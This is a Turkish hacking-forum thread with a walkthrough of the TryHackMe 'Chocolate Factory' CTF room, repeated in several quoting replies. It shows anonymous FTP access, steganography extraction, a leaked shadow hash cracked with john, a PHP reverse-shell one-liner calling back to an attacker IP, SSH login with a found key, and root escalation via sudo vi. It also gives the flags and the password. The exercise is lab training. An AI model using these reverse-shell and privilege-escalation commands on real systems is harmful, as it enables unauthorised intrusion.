TryHackMe | Chocolate Factory WriteMe

6 May 2022
124
79
shp4vi9.png






5t36e7x.png


logo.png

Herkese Merhabalarlar Bugün Sizlerle Chocolate Factory İsimli Ctfyi çözeceğiz

Link : TryHackMe | Chocolate Factory

f4j1r6w.png

1.SORU
Enter the key you found!

ob70svv.jpg

siteye girdiğimizde karşımıza böyle bi login panel çıkıyor

şimdi nmap taraması yapalım

j5b1f4h.PNG


21.port ftp portunun açık olduğunu görüyoruz
ve anonymous olarak giryoruz girdiğimizde gum_room.jpg isminde bi resim buluyoruz bunu kendi bilgisayarımıza aktarıyoruz

qpqqhmm.jpg

ve resmi steghidela kırıyoruz
7nzycmy.jpg

b64.txt nin içine bakıyoruz ve ismindende anlaşılacağı şekilde base64 ile şifrelenmiş olduğunu anlıyoruz
ve base64 decode sitesi ile kırıyoruz "Base64 Decode and Encode - Online"

daemon:*:18380:0:99999:7:::
bin:*:18380:0:99999:7:::
sys:*:18380:0:99999:7:::
sync:*:18380:0:99999:7:::
games:*:18380:0:99999:7:::
man:*:18380:0:99999:7:::
lp:*:18380:0:99999:7:::
mail:*:18380:0:99999:7:::
news:*:18380:0:99999:7:::
uucp:*:18380:0:99999:7:::
proxy:*:18380:0:99999:7:::
www-data:*:18380:0:99999:7:::
backup:*:18380:0:99999:7:::
list:*:18380:0:99999:7:::
irc:*:18380:0:99999:7:::
gnats:*:18380:0:99999:7:::
nobody:*:18380:0:99999:7:::
systemd-timesync:*:18380:0:99999:7:::
systemd-network:*:18380:0:99999:7:::
systemd-resolve:*:18380:0:99999:7:::
_apt:*:18380:0:99999:7:::
mysql:!:18382:0:99999:7:::
tss:*:18382:0:99999:7:::
shellinabox:*:18382:0:99999:7:::
strongswan:*:18382:0:99999:7:::
ntp:*:18382:0:99999:7:::
messagebus:*:18382:0:99999:7:::
arpwatch:!:18382:0:99999:7:::
Debian-exim:!:18382:0:99999:7:::
uuidd:*:18382:0:99999:7:::
debian-tor:*:18382:0:99999:7:::
redsocks:!:18382:0:99999:7:::
freerad:*:18382:0:99999:7:::
iodine:*:18382:0:99999:7:::
tcpdump:*:18382:0:99999:7:::
miredo:*:18382:0:99999:7:::
dnsmasq:*:18382:0:99999:7:::
redis:*:18382:0:99999:7:::
usbmux:*:18382:0:99999:7:::
rtkit:*:18382:0:99999:7:::
sshd:*:18382:0:99999:7:::
postgres:*:18382:0:99999:7:::
avahi:*:18382:0:99999:7:::
stunnel4:!:18382:0:99999:7:::
sslh:!:18382:0:99999:7:::
nm-openvpn:*:18382:0:99999:7:::
nm-openconnect:*:18382:0:99999:7:::
pulse:*:18382:0:99999:7:::
saned:*:18382:0:99999:7:::
inetsim:*:18382:0:99999:7:::
colord:*:18382:0:99999:7:::
i2psvc:*:18382:0:99999:7:::
dradis:*:18382:0:99999:7:::
beef-xss:*:18382:0:99999:7:::
geoclue:*:18382:0:99999:7:::
lightdm:*:18382:0:99999:7:::
king-phisher:*:18382:0:99999:7:::
systemd-coredump:!!:18396::::::
_rpc:*:18451:0:99999:7:::
statd:*:18451:0:99999:7:::
_gvm:*:18496:0:99999:7:::
charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::



ve bunlar çıkıyor en aşağıda charlienin şifresini görüyoruz charlienin şifresi şifrelenmişti onu çözmek için john kullanıcaz
john passwd -w=/usr/share/wordlists/rockyou.txt
yazıyoruz ve işlem sonucu şifremiz cn7824 çıkıyor bunu sitedeki login panelde deniyoruz ve
giriş yapıyoruz

önümüze bir command excute çıkıyor


4r5mve1.jpg


php -r '$sock=fsockopen("10.18.73.7",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
bu kodu yazarak kendimize bir kapı açıyoruz
bu kodu yazmadan önce 1234 portunu nc ile dinlemeye alıyoruz
ve kodu sonra yazıyoruz

nodc9iy.PNG


ve erişim sağlıyoruz sonra key_rev_key isminde bi dosya var bu dosyanın stringslerine bakıyoruz

sewb6am.jpg


ve şifremizi buluyoruz

Cevap : b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

2.SORU

What is Charlie's password?
yukarda bulmuştuk

Cevap : cn7824

3.SORU

Enter the user flag
Bizden user flagını istiyor

cd /
yazarak en başa geliyoruz
cd home
cd charlie

diyerek charlie kullanıcısına geliyoruz
burda user.txtyi görüyoruz fakat yetkimiz yetmiyor
burda teleport isminde bir dosya daha var catla onu açıyoruz

4v4ba4f.jpg

burda bir rsa id görüyoruz bununla ssh a girmeye çalışıyoruz

ilk başta bu rsa keyini bi not defterine kaydediyoruz ben ismini id_rsa yaptım
sonra ssh charlie@<hedefip> -i id_rsa yazıyoruz

ve bağlanıyoruz

1ud8e2w.jpg

cd home
cd charlie
cat user.txt

yazarak buluyoruz​

n01jqld.jpg


Cevap : flag{cd5509042371b34e4826e4838b522d2e}

4.SORU

Enter the root flag
bizden root flagını istiyor
bunun için sudo -l yazıyoruz

b0peo31.jpg


burdan anlıyoruz ki pass sız root olarak erişebildiğimiz vi varmış

giftobins e giriyoruz

ve vi yi arattığımızda bunu buluyoruz

sudo vi -c ':!/bin/sh' /dev/null

yazıyoruz ve root yetkisini alıyoruz

şimdi en başa geliyoruz

cd /

cd root

ls

yazdığımızda root.py isminde bi dosya görüyoruz

python root.py diyoruz
ve bizden key istiyor şifremiz en baştaki bulduğumuz şifre
giriyoruz
l3ytma8.jpg


Cevap : flag{cec59161d338fef787fcb4e296b42124}


İyi Günler Dilerim

atat%C3%BCrk-sigara.gif










 

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,933
21
1,815
31
MyKrallife
shp4vi9.png






5t36e7x.png


logo.png

Herkese Merhabalarlar Bugün Sizlerle Chocolate Factory İsimli Ctfyi çözeceğiz

Link : TryHackMe | Chocolate Factory

f4j1r6w.png

1.SORU
Enter the key you found!

ob70svv.jpg

siteye girdiğimizde karşımıza böyle bi login panel çıkıyor

şimdi nmap taraması yapalım

j5b1f4h.PNG


21.port ftp portunun açık olduğunu görüyoruz
ve anonymous olarak giryoruz girdiğimizde gum_room.jpg isminde bi resim buluyoruz bunu kendi bilgisayarımıza aktarıyoruz

qpqqhmm.jpg

ve resmi steghidela kırıyoruz
7nzycmy.jpg

b64.txt nin içine bakıyoruz ve ismindende anlaşılacağı şekilde base64 ile şifrelenmiş olduğunu anlıyoruz
ve base64 decode sitesi ile kırıyoruz "Base64 Decode and Encode - Online"

daemon:*:18380:0:99999:7:::
bin:*:18380:0:99999:7:::
sys:*:18380:0:99999:7:::
sync:*:18380:0:99999:7:::
games:*:18380:0:99999:7:::
man:*:18380:0:99999:7:::
lp:*:18380:0:99999:7:::
mail:*:18380:0:99999:7:::
news:*:18380:0:99999:7:::
uucp:*:18380:0:99999:7:::
proxy:*:18380:0:99999:7:::
www-data:*:18380:0:99999:7:::
backup:*:18380:0:99999:7:::
list:*:18380:0:99999:7:::
irc:*:18380:0:99999:7:::
gnats:*:18380:0:99999:7:::
nobody:*:18380:0:99999:7:::
systemd-timesync:*:18380:0:99999:7:::
systemd-network:*:18380:0:99999:7:::
systemd-resolve:*:18380:0:99999:7:::
_apt:*:18380:0:99999:7:::
mysql:!:18382:0:99999:7:::
tss:*:18382:0:99999:7:::
shellinabox:*:18382:0:99999:7:::
strongswan:*:18382:0:99999:7:::
ntp:*:18382:0:99999:7:::
messagebus:*:18382:0:99999:7:::
arpwatch:!:18382:0:99999:7:::
Debian-exim:!:18382:0:99999:7:::
uuidd:*:18382:0:99999:7:::
debian-tor:*:18382:0:99999:7:::
redsocks:!:18382:0:99999:7:::
freerad:*:18382:0:99999:7:::
iodine:*:18382:0:99999:7:::
tcpdump:*:18382:0:99999:7:::
miredo:*:18382:0:99999:7:::
dnsmasq:*:18382:0:99999:7:::
redis:*:18382:0:99999:7:::
usbmux:*:18382:0:99999:7:::
rtkit:*:18382:0:99999:7:::
sshd:*:18382:0:99999:7:::
postgres:*:18382:0:99999:7:::
avahi:*:18382:0:99999:7:::
stunnel4:!:18382:0:99999:7:::
sslh:!:18382:0:99999:7:::
nm-openvpn:*:18382:0:99999:7:::
nm-openconnect:*:18382:0:99999:7:::
pulse:*:18382:0:99999:7:::
saned:*:18382:0:99999:7:::
inetsim:*:18382:0:99999:7:::
colord:*:18382:0:99999:7:::
i2psvc:*:18382:0:99999:7:::
dradis:*:18382:0:99999:7:::
beef-xss:*:18382:0:99999:7:::
geoclue:*:18382:0:99999:7:::
lightdm:*:18382:0:99999:7:::
king-phisher:*:18382:0:99999:7:::
systemd-coredump:!!:18396::::::
_rpc:*:18451:0:99999:7:::
statd:*:18451:0:99999:7:::
_gvm:*:18496:0:99999:7:::
charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::



ve bunlar çıkıyor en aşağıda charlienin şifresini görüyoruz charlienin şifresi şifrelenmişti onu çözmek için john kullanıcaz
john passwd -w=/usr/share/wordlists/rockyou.txt
yazıyoruz ve işlem sonucu şifremiz cn7824 çıkıyor bunu sitedeki login panelde deniyoruz ve
giriş yapıyoruz

önümüze bir command excute çıkıyor


4r5mve1.jpg


php -r '$sock=fsockopen("10.18.73.7",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
bu kodu yazarak kendimize bir kapı açıyoruz
bu kodu yazmadan önce 1234 portunu nc ile dinlemeye alıyoruz
ve kodu sonra yazıyoruz

nodc9iy.PNG


ve erişim sağlıyoruz sonra key_rev_key isminde bi dosya var bu dosyanın stringslerine bakıyoruz

sewb6am.jpg


ve şifremizi buluyoruz

Cevap : b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

2.SORU

What is Charlie's password?
yukarda bulmuştuk

Cevap : cn7824

3.SORU

Enter the user flag
Bizden user flagını istiyor

cd /
yazarak en başa geliyoruz
cd home
cd charlie

diyerek charlie kullanıcısına geliyoruz
burda user.txtyi görüyoruz fakat yetkimiz yetmiyor
burda teleport isminde bir dosya daha var catla onu açıyoruz

4v4ba4f.jpg

burda bir rsa id görüyoruz bununla ssh a girmeye çalışıyoruz

ilk başta bu rsa keyini bi not defterine kaydediyoruz ben ismini id_rsa yaptım
sonra ssh charlie@<hedefip> -i id_rsa yazıyoruz

ve bağlanıyoruz

1ud8e2w.jpg

cd home
cd charlie
cat user.txt

yazarak buluyoruz​

n01jqld.jpg


Cevap : flag{cd5509042371b34e4826e4838b522d2e}

4.SORU

Enter the root flag
bizden root flagını istiyor
bunun için sudo -l yazıyoruz

b0peo31.jpg


burdan anlıyoruz ki pass sız root olarak erişebildiğimiz vi varmış

giftobins e giriyoruz

ve vi yi arattığımızda bunu buluyoruz

sudo vi -c ':!/bin/sh' /dev/null

yazıyoruz ve root yetkisini alıyoruz

şimdi en başa geliyoruz

cd /

cd root

ls

yazdığımızda root.py isminde bi dosya görüyoruz

python root.py diyoruz
ve bizden key istiyor şifremiz en baştaki bulduğumuz şifre
giriyoruz
l3ytma8.jpg


Cevap : flag{cec59161d338fef787fcb4e296b42124}


İyi Günler Dilerim

atat%C3%BCrk-sigara.gif










Eline sağlık
agme-ahmet-cem-ersever.gif

 

GECEYARASA

Üye
4 Eyl 2022
144
89
Ottoman
shp4vi9.png






5t36e7x.png


logo.png

Herkese Merhabalarlar Bugün Sizlerle Chocolate Factory İsimli Ctfyi çözeceğiz

Link : TryHackMe | Chocolate Factory

f4j1r6w.png

1.SORU
Enter the key you found!

ob70svv.jpg

siteye girdiğimizde karşımıza böyle bi login panel çıkıyor

şimdi nmap taraması yapalım

j5b1f4h.PNG


21.port ftp portunun açık olduğunu görüyoruz
ve anonymous olarak giryoruz girdiğimizde gum_room.jpg isminde bi resim buluyoruz bunu kendi bilgisayarımıza aktarıyoruz

qpqqhmm.jpg

ve resmi steghidela kırıyoruz
7nzycmy.jpg

b64.txt nin içine bakıyoruz ve ismindende anlaşılacağı şekilde base64 ile şifrelenmiş olduğunu anlıyoruz
ve base64 decode sitesi ile kırıyoruz "Base64 Decode and Encode - Online"

daemon:*:18380:0:99999:7:::
bin:*:18380:0:99999:7:::
sys:*:18380:0:99999:7:::
sync:*:18380:0:99999:7:::
games:*:18380:0:99999:7:::
man:*:18380:0:99999:7:::
lp:*:18380:0:99999:7:::
mail:*:18380:0:99999:7:::
news:*:18380:0:99999:7:::
uucp:*:18380:0:99999:7:::
proxy:*:18380:0:99999:7:::
www-data:*:18380:0:99999:7:::
backup:*:18380:0:99999:7:::
list:*:18380:0:99999:7:::
irc:*:18380:0:99999:7:::
gnats:*:18380:0:99999:7:::
nobody:*:18380:0:99999:7:::
systemd-timesync:*:18380:0:99999:7:::
systemd-network:*:18380:0:99999:7:::
systemd-resolve:*:18380:0:99999:7:::
_apt:*:18380:0:99999:7:::
mysql:!:18382:0:99999:7:::
tss:*:18382:0:99999:7:::
shellinabox:*:18382:0:99999:7:::
strongswan:*:18382:0:99999:7:::
ntp:*:18382:0:99999:7:::
messagebus:*:18382:0:99999:7:::
arpwatch:!:18382:0:99999:7:::
Debian-exim:!:18382:0:99999:7:::
uuidd:*:18382:0:99999:7:::
debian-tor:*:18382:0:99999:7:::
redsocks:!:18382:0:99999:7:::
freerad:*:18382:0:99999:7:::
iodine:*:18382:0:99999:7:::
tcpdump:*:18382:0:99999:7:::
miredo:*:18382:0:99999:7:::
dnsmasq:*:18382:0:99999:7:::
redis:*:18382:0:99999:7:::
usbmux:*:18382:0:99999:7:::
rtkit:*:18382:0:99999:7:::
sshd:*:18382:0:99999:7:::
postgres:*:18382:0:99999:7:::
avahi:*:18382:0:99999:7:::
stunnel4:!:18382:0:99999:7:::
sslh:!:18382:0:99999:7:::
nm-openvpn:*:18382:0:99999:7:::
nm-openconnect:*:18382:0:99999:7:::
pulse:*:18382:0:99999:7:::
saned:*:18382:0:99999:7:::
inetsim:*:18382:0:99999:7:::
colord:*:18382:0:99999:7:::
i2psvc:*:18382:0:99999:7:::
dradis:*:18382:0:99999:7:::
beef-xss:*:18382:0:99999:7:::
geoclue:*:18382:0:99999:7:::
lightdm:*:18382:0:99999:7:::
king-phisher:*:18382:0:99999:7:::
systemd-coredump:!!:18396::::::
_rpc:*:18451:0:99999:7:::
statd:*:18451:0:99999:7:::
_gvm:*:18496:0:99999:7:::
charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::



ve bunlar çıkıyor en aşağıda charlienin şifresini görüyoruz charlienin şifresi şifrelenmişti onu çözmek için john kullanıcaz
john passwd -w=/usr/share/wordlists/rockyou.txt
yazıyoruz ve işlem sonucu şifremiz cn7824 çıkıyor bunu sitedeki login panelde deniyoruz ve
giriş yapıyoruz

önümüze bir command excute çıkıyor


4r5mve1.jpg


php -r '$sock=fsockopen("10.18.73.7",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
bu kodu yazarak kendimize bir kapı açıyoruz
bu kodu yazmadan önce 1234 portunu nc ile dinlemeye alıyoruz
ve kodu sonra yazıyoruz

nodc9iy.PNG


ve erişim sağlıyoruz sonra key_rev_key isminde bi dosya var bu dosyanın stringslerine bakıyoruz

sewb6am.jpg


ve şifremizi buluyoruz

Cevap : b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

2.SORU

What is Charlie's password?
yukarda bulmuştuk

Cevap : cn7824

3.SORU

Enter the user flag
Bizden user flagını istiyor

cd /
yazarak en başa geliyoruz
cd home
cd charlie

diyerek charlie kullanıcısına geliyoruz
burda user.txtyi görüyoruz fakat yetkimiz yetmiyor
burda teleport isminde bir dosya daha var catla onu açıyoruz

4v4ba4f.jpg

burda bir rsa id görüyoruz bununla ssh a girmeye çalışıyoruz

ilk başta bu rsa keyini bi not defterine kaydediyoruz ben ismini id_rsa yaptım
sonra ssh charlie@<hedefip> -i id_rsa yazıyoruz

ve bağlanıyoruz

1ud8e2w.jpg

cd home
cd charlie
cat user.txt

yazarak buluyoruz​

n01jqld.jpg


Cevap : flag{cd5509042371b34e4826e4838b522d2e}

4.SORU

Enter the root flag
bizden root flagını istiyor
bunun için sudo -l yazıyoruz

b0peo31.jpg


burdan anlıyoruz ki pass sız root olarak erişebildiğimiz vi varmış

giftobins e giriyoruz

ve vi yi arattığımızda bunu buluyoruz

sudo vi -c ':!/bin/sh' /dev/null

yazıyoruz ve root yetkisini alıyoruz

şimdi en başa geliyoruz

cd /

cd root

ls

yazdığımızda root.py isminde bi dosya görüyoruz

python root.py diyoruz
ve bizden key istiyor şifremiz en baştaki bulduğumuz şifre
giriyoruz
l3ytma8.jpg


Cevap : flag{cec59161d338fef787fcb4e296b42124}


İyi Günler Dilerim

atat%C3%BCrk-sigara.gif










eline sağlık
 

UZAY 52

Uzman üye
14 Ağu 2021
1,298
10
833
Ddos
shp4vi9.png






5t36e7x.png


logo.png

Herkese Merhabalarlar Bugün Sizlerle Chocolate Factory İsimli Ctfyi çözeceğiz

Link : TryHackMe | Chocolate Factory

f4j1r6w.png

1.SORU
Enter the key you found!

ob70svv.jpg

siteye girdiğimizde karşımıza böyle bi login panel çıkıyor

şimdi nmap taraması yapalım

j5b1f4h.PNG


21.port ftp portunun açık olduğunu görüyoruz
ve anonymous olarak giryoruz girdiğimizde gum_room.jpg isminde bi resim buluyoruz bunu kendi bilgisayarımıza aktarıyoruz

qpqqhmm.jpg

ve resmi steghidela kırıyoruz
7nzycmy.jpg

b64.txt nin içine bakıyoruz ve ismindende anlaşılacağı şekilde base64 ile şifrelenmiş olduğunu anlıyoruz
ve base64 decode sitesi ile kırıyoruz "Base64 Decode and Encode - Online"

daemon:*:18380:0:99999:7:::
bin:*:18380:0:99999:7:::
sys:*:18380:0:99999:7:::
sync:*:18380:0:99999:7:::
games:*:18380:0:99999:7:::
man:*:18380:0:99999:7:::
lp:*:18380:0:99999:7:::
mail:*:18380:0:99999:7:::
news:*:18380:0:99999:7:::
uucp:*:18380:0:99999:7:::
proxy:*:18380:0:99999:7:::
www-data:*:18380:0:99999:7:::
backup:*:18380:0:99999:7:::
list:*:18380:0:99999:7:::
irc:*:18380:0:99999:7:::
gnats:*:18380:0:99999:7:::
nobody:*:18380:0:99999:7:::
systemd-timesync:*:18380:0:99999:7:::
systemd-network:*:18380:0:99999:7:::
systemd-resolve:*:18380:0:99999:7:::
_apt:*:18380:0:99999:7:::
mysql:!:18382:0:99999:7:::
tss:*:18382:0:99999:7:::
shellinabox:*:18382:0:99999:7:::
strongswan:*:18382:0:99999:7:::
ntp:*:18382:0:99999:7:::
messagebus:*:18382:0:99999:7:::
arpwatch:!:18382:0:99999:7:::
Debian-exim:!:18382:0:99999:7:::
uuidd:*:18382:0:99999:7:::
debian-tor:*:18382:0:99999:7:::
redsocks:!:18382:0:99999:7:::
freerad:*:18382:0:99999:7:::
iodine:*:18382:0:99999:7:::
tcpdump:*:18382:0:99999:7:::
miredo:*:18382:0:99999:7:::
dnsmasq:*:18382:0:99999:7:::
redis:*:18382:0:99999:7:::
usbmux:*:18382:0:99999:7:::
rtkit:*:18382:0:99999:7:::
sshd:*:18382:0:99999:7:::
postgres:*:18382:0:99999:7:::
avahi:*:18382:0:99999:7:::
stunnel4:!:18382:0:99999:7:::
sslh:!:18382:0:99999:7:::
nm-openvpn:*:18382:0:99999:7:::
nm-openconnect:*:18382:0:99999:7:::
pulse:*:18382:0:99999:7:::
saned:*:18382:0:99999:7:::
inetsim:*:18382:0:99999:7:::
colord:*:18382:0:99999:7:::
i2psvc:*:18382:0:99999:7:::
dradis:*:18382:0:99999:7:::
beef-xss:*:18382:0:99999:7:::
geoclue:*:18382:0:99999:7:::
lightdm:*:18382:0:99999:7:::
king-phisher:*:18382:0:99999:7:::
systemd-coredump:!!:18396::::::
_rpc:*:18451:0:99999:7:::
statd:*:18451:0:99999:7:::
_gvm:*:18496:0:99999:7:::
charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::



ve bunlar çıkıyor en aşağıda charlienin şifresini görüyoruz charlienin şifresi şifrelenmişti onu çözmek için john kullanıcaz
john passwd -w=/usr/share/wordlists/rockyou.txt
yazıyoruz ve işlem sonucu şifremiz cn7824 çıkıyor bunu sitedeki login panelde deniyoruz ve
giriş yapıyoruz

önümüze bir command excute çıkıyor


4r5mve1.jpg


php -r '$sock=fsockopen("10.18.73.7",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
bu kodu yazarak kendimize bir kapı açıyoruz
bu kodu yazmadan önce 1234 portunu nc ile dinlemeye alıyoruz
ve kodu sonra yazıyoruz

nodc9iy.PNG


ve erişim sağlıyoruz sonra key_rev_key isminde bi dosya var bu dosyanın stringslerine bakıyoruz

sewb6am.jpg


ve şifremizi buluyoruz

Cevap : b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

2.SORU

What is Charlie's password?
yukarda bulmuştuk

Cevap : cn7824

3.SORU

Enter the user flag
Bizden user flagını istiyor

cd /
yazarak en başa geliyoruz
cd home
cd charlie

diyerek charlie kullanıcısına geliyoruz
burda user.txtyi görüyoruz fakat yetkimiz yetmiyor
burda teleport isminde bir dosya daha var catla onu açıyoruz

4v4ba4f.jpg

burda bir rsa id görüyoruz bununla ssh a girmeye çalışıyoruz

ilk başta bu rsa keyini bi not defterine kaydediyoruz ben ismini id_rsa yaptım
sonra ssh charlie@<hedefip> -i id_rsa yazıyoruz

ve bağlanıyoruz

1ud8e2w.jpg

cd home
cd charlie
cat user.txt

yazarak buluyoruz​

n01jqld.jpg


Cevap : flag{cd5509042371b34e4826e4838b522d2e}

4.SORU

Enter the root flag
bizden root flagını istiyor
bunun için sudo -l yazıyoruz

b0peo31.jpg


burdan anlıyoruz ki pass sız root olarak erişebildiğimiz vi varmış

giftobins e giriyoruz

ve vi yi arattığımızda bunu buluyoruz

sudo vi -c ':!/bin/sh' /dev/null

yazıyoruz ve root yetkisini alıyoruz

şimdi en başa geliyoruz

cd /

cd root

ls

yazdığımızda root.py isminde bi dosya görüyoruz

python root.py diyoruz
ve bizden key istiyor şifremiz en baştaki bulduğumuz şifre
giriyoruz
l3ytma8.jpg


Cevap : flag{cec59161d338fef787fcb4e296b42124}


İyi Günler Dilerim

atat%C3%BCrk-sigara.gif










Eline sağlık
 
Son düzenleme:
6 May 2022
124
79
Gerçek makine çözmesi bu kadar zor değil.
Ellerine sağlık güzel konu ama gif bu olmasın :)
agme-ahmet-cem-ersever.gif
Eline sağlık gif in linkini koymayaydın iyiydi :) yanlış link atmışsın heralde dostum bi bak istersen
Eline emeğine sağlık kral :ninja:
Teşekkür ederim
 

JohnWick51

Uzman üye
20 Mar 2022
1,867
770
28
shp4vi9.png






5t36e7x.png


logo.png

Herkese Merhabalarlar Bugün Sizlerle Chocolate Factory İsimli Ctfyi çözeceğiz

Link : TryHackMe | Chocolate Factory

f4j1r6w.png

1.SORU
Enter the key you found!

ob70svv.jpg

siteye girdiğimizde karşımıza böyle bi login panel çıkıyor

şimdi nmap taraması yapalım

j5b1f4h.PNG


21.port ftp portunun açık olduğunu görüyoruz
ve anonymous olarak giryoruz girdiğimizde gum_room.jpg isminde bi resim buluyoruz bunu kendi bilgisayarımıza aktarıyoruz

qpqqhmm.jpg

ve resmi steghidela kırıyoruz
7nzycmy.jpg

b64.txt nin içine bakıyoruz ve ismindende anlaşılacağı şekilde base64 ile şifrelenmiş olduğunu anlıyoruz
ve base64 decode sitesi ile kırıyoruz "Base64 Decode and Encode - Online"

daemon:*:18380:0:99999:7:::
bin:*:18380:0:99999:7:::
sys:*:18380:0:99999:7:::
sync:*:18380:0:99999:7:::
games:*:18380:0:99999:7:::
man:*:18380:0:99999:7:::
lp:*:18380:0:99999:7:::
mail:*:18380:0:99999:7:::
news:*:18380:0:99999:7:::
uucp:*:18380:0:99999:7:::
proxy:*:18380:0:99999:7:::
www-data:*:18380:0:99999:7:::
backup:*:18380:0:99999:7:::
list:*:18380:0:99999:7:::
irc:*:18380:0:99999:7:::
gnats:*:18380:0:99999:7:::
nobody:*:18380:0:99999:7:::
systemd-timesync:*:18380:0:99999:7:::
systemd-network:*:18380:0:99999:7:::
systemd-resolve:*:18380:0:99999:7:::
_apt:*:18380:0:99999:7:::
mysql:!:18382:0:99999:7:::
tss:*:18382:0:99999:7:::
shellinabox:*:18382:0:99999:7:::
strongswan:*:18382:0:99999:7:::
ntp:*:18382:0:99999:7:::
messagebus:*:18382:0:99999:7:::
arpwatch:!:18382:0:99999:7:::
Debian-exim:!:18382:0:99999:7:::
uuidd:*:18382:0:99999:7:::
debian-tor:*:18382:0:99999:7:::
redsocks:!:18382:0:99999:7:::
freerad:*:18382:0:99999:7:::
iodine:*:18382:0:99999:7:::
tcpdump:*:18382:0:99999:7:::
miredo:*:18382:0:99999:7:::
dnsmasq:*:18382:0:99999:7:::
redis:*:18382:0:99999:7:::
usbmux:*:18382:0:99999:7:::
rtkit:*:18382:0:99999:7:::
sshd:*:18382:0:99999:7:::
postgres:*:18382:0:99999:7:::
avahi:*:18382:0:99999:7:::
stunnel4:!:18382:0:99999:7:::
sslh:!:18382:0:99999:7:::
nm-openvpn:*:18382:0:99999:7:::
nm-openconnect:*:18382:0:99999:7:::
pulse:*:18382:0:99999:7:::
saned:*:18382:0:99999:7:::
inetsim:*:18382:0:99999:7:::
colord:*:18382:0:99999:7:::
i2psvc:*:18382:0:99999:7:::
dradis:*:18382:0:99999:7:::
beef-xss:*:18382:0:99999:7:::
geoclue:*:18382:0:99999:7:::
lightdm:*:18382:0:99999:7:::
king-phisher:*:18382:0:99999:7:::
systemd-coredump:!!:18396::::::
_rpc:*:18451:0:99999:7:::
statd:*:18451:0:99999:7:::
_gvm:*:18496:0:99999:7:::
charlie:$6$CZJnCPeQWp9/jpNx$khGlFdICJnr8R3JC/jTR2r7DrbFLp8zq8469d3c0.zuKN4se61FObwWGxcHZqO2RJHkkL1jjPYeeGyIJWE82X/:18535:0:99999:7:::



ve bunlar çıkıyor en aşağıda charlienin şifresini görüyoruz charlienin şifresi şifrelenmişti onu çözmek için john kullanıcaz
john passwd -w=/usr/share/wordlists/rockyou.txt
yazıyoruz ve işlem sonucu şifremiz cn7824 çıkıyor bunu sitedeki login panelde deniyoruz ve
giriş yapıyoruz

önümüze bir command excute çıkıyor


4r5mve1.jpg


php -r '$sock=fsockopen("10.18.73.7",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
bu kodu yazarak kendimize bir kapı açıyoruz
bu kodu yazmadan önce 1234 portunu nc ile dinlemeye alıyoruz
ve kodu sonra yazıyoruz

nodc9iy.PNG


ve erişim sağlıyoruz sonra key_rev_key isminde bi dosya var bu dosyanın stringslerine bakıyoruz

sewb6am.jpg


ve şifremizi buluyoruz

Cevap : b'-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY='

2.SORU

What is Charlie's password?
yukarda bulmuştuk

Cevap : cn7824

3.SORU

Enter the user flag
Bizden user flagını istiyor

cd /
yazarak en başa geliyoruz
cd home
cd charlie

diyerek charlie kullanıcısına geliyoruz
burda user.txtyi görüyoruz fakat yetkimiz yetmiyor
burda teleport isminde bir dosya daha var catla onu açıyoruz

4v4ba4f.jpg

burda bir rsa id görüyoruz bununla ssh a girmeye çalışıyoruz

ilk başta bu rsa keyini bi not defterine kaydediyoruz ben ismini id_rsa yaptım
sonra ssh charlie@<hedefip> -i id_rsa yazıyoruz

ve bağlanıyoruz

1ud8e2w.jpg

cd home
cd charlie
cat user.txt

yazarak buluyoruz​

n01jqld.jpg


Cevap : flag{cd5509042371b34e4826e4838b522d2e}

4.SORU

Enter the root flag
bizden root flagını istiyor
bunun için sudo -l yazıyoruz

b0peo31.jpg


burdan anlıyoruz ki pass sız root olarak erişebildiğimiz vi varmış

giftobins e giriyoruz

ve vi yi arattığımızda bunu buluyoruz

sudo vi -c ':!/bin/sh' /dev/null

yazıyoruz ve root yetkisini alıyoruz

şimdi en başa geliyoruz

cd /

cd root

ls

yazdığımızda root.py isminde bi dosya görüyoruz

python root.py diyoruz
ve bizden key istiyor şifremiz en baştaki bulduğumuz şifre
giriyoruz
l3ytma8.jpg


Cevap : flag{cec59161d338fef787fcb4e296b42124}


İyi Günler Dilerim

atat%C3%BCrk-sigara.gif










Ellerine saglik
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.